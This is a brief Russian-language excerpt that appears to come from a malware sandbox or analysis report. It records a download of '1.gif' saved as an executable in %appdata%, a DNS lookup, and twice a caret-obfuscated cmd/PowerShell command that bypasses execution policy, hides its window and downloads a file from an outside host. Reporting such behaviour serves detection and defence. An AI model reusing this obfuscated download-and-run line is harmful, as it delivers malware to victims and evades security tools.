Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^E^Rs^He^L^L.E^xE^ -eXEc^uTI^onPOLiCy^ By^pasS^ -N^OpRoF^iLE ^-WINd^OWs^Ty^LE HI^dD^En (^n^ew-O^b^JeC^T SYSTE^M.n^eT.web^c^Lie^NT^)^.^DoWn^Loa^dFil^E^('http://www.fapoergol.top/...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^E^Rs^He^L^L.E^xE^ -eXEc^uTI^onPOLiCy^ By^pasS^ -N^OpRoF^iLE ^-WINd^OWs^Ty^LE HI^dD^En (^n^ew-O^b^JeC^T SYSTE^M.n^eT.web^c^Lie^NT^)^.^DoWn^Loa^dFil^E^('http://www.fapoergol.top/...' (со скрытым окном)